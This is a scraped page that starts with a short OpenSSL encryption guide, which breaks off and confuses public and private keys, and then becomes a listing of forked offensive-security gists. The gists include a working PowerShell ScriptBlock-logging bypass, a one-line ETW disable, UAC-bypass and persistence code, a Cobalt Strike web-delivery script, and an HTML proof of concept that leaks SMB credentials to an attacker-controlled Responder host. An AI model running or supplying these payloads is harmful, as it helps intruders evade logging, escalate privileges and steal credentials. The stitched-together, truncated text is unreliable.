A Guide to Encrypting Files with Mac OS X

This guide will demonstrate the steps required to encrypt and decrypt files using OpenSSL on Mac OS X. The working assumption is that by demonstrating how to encrypt a file with your own public key, you'll also be able to encrypt a file you plan to send to somebody else using their private key, though you may wish to use this approach to keep archived data safe from prying eyes.

Too Long, Didn't Read

Assuming you've already done the setup described later in this document, that id_rsa.pub.pcks8 is the public key you want to use, that id_rsa is the private key the recipient will use, and secret.txt is the data you want to transmit…

Encrypting

$ openssl rand 192 -out key

$ openssl aes-256-cbc -in secret.txt -out secret.txt.enc -pass file:key

0x4243 / gist:257c37ccf70ce51d336fb3a7e1364a15

Created December 6, 2017 10:29 — forked from carnal0wnage/gist:606c41ac6ec40bf5c69d4db96d9312e3

Red Team Books

	From: http://redteams.net/bookshelf/
	Techie

	Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
	Social Engineering: The Art of Human Hacking by Christopher Hadnagy
	Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
	The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
	Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
	Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
	The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors

0x4243 / ScriptBlockLogBypass.ps1

Created November 18, 2017 05:16 — forked from cobbr/ScriptBlockLogBypass.ps1

ScriptBlock Logging Bypass

	# ScriptBlock Logging Bypass
	# @cobbr_io

	$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
	If ($GroupPolicyField) {
	$GroupPolicyCache = $GroupPolicyField.GetValue($null)
	If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
	}

0x4243 / KillETW.ps1

Created November 18, 2017 05:06 — forked from tandasat/KillETW.ps1

Disable ETW of the current PowerShell session

	#
	# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
	# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
	# to bypass Suspicious ScriptBlock Logging for readability.
	#
	[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)

0x4243 / vba-windows-persistence.vbs

Created November 10, 2017 08:45 — forked from mgeeky/vba-windows-persistence.vbs

VBA Script implementing two windows persistence methods - via WMI EventFilter object and via simple Registry Run.

	'
	' SYNOPSIS:
	' This macro implements two windows persistence methods:
	' - WMI Event Filter object creation
	' - simple HKCU Registry Run value insertion. It has to be HKCU to make it work under Win10 x64
	'
	' WMI Persistence method as originally presented by SEADADDY malware
	' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
	' and further documented by Matt Graeber.
	'

0x4243 / akagi_42b.c

Created November 8, 2017 12:32 — forked from hfiref0x/akagi_42b.c

UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack

	typedef interface IFwCplLua IFwCplLua;

	typedef struct IFwCplLuaInterfaceVtbl {

	BEGIN_INTERFACE

	HRESULT(STDMETHODCALLTYPE *QueryInterface)(
	__RPC__in IFwCplLua * This,
	__RPC__in REFIID riid,
	_COM_Outptr_ void **ppvObject);

0x4243 / stagelessweb.cna

Created November 8, 2017 12:12 — forked from rsmudge/stagelessweb.cna

A stageless variant of the PowerShell Web Delivery attack. This script demonstrates the new scripting APIs in Cobalt Strike 3.7 (generate stageless artifacts, host content on Cobalt Strike's web server, build dialogs, etc.)

	# Scripted Web Delivery (Stageless)
	#
	# This script demonstrates some of the new APIs in Cobalt Strike 3.7.

	# setup our stageless PowerShell Web Delivery attack
	sub setup_attack {
	local('%options $script $url $arch');
	%options = $3;

	# get the arch right.

0x4243 / smb-credential-leak.html

Created October 16, 2017 08:26 — forked from mgeeky/smb-credential-leak.html

SMB Credentials leakage by MSEdge as presented in Browser Security White Paper, X41 D-Sec GmbH.

	<!-- PoC for leaking SMB Credentials with listening Responder -->
	<!-- as presented by X41 D-Sec GmbH in Browser Security White Paper. -->
	<!-- To be used as: $ `responder -I eth0 -w -r f -v` -->
	<body onmousemove="document.getElementById(6).click()">
	<a id=6 href="\\192.168.56.101\edgeleak" download></a>
	</body>

0x4243 / fsharp.fsscript

Created September 3, 2017 21:14 — forked from NickTyrer/fsharp.fsscript

fsi.exe inline execution

	#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"

	open System.Management.Automation
	open System.Management.Automation.Runspaces
	open System

	let runSpace = RunspaceFactory.CreateRunspace()
	runSpace.Open()
	let pipeline = runSpace.CreatePipeline()

0x4243 / levelup.csproj

Created September 2, 2017 18:37

MSBuild.exe "LevelUP" - QueueUserAPC Shellcode

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe levelup.csproj -->
	<!-- Choose Framework based on Platform -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe levelup.csproj -->
	<Target Name="Hello">
	<FragmentExample />
	<ClassExample />
	</Target>
	<UsingTask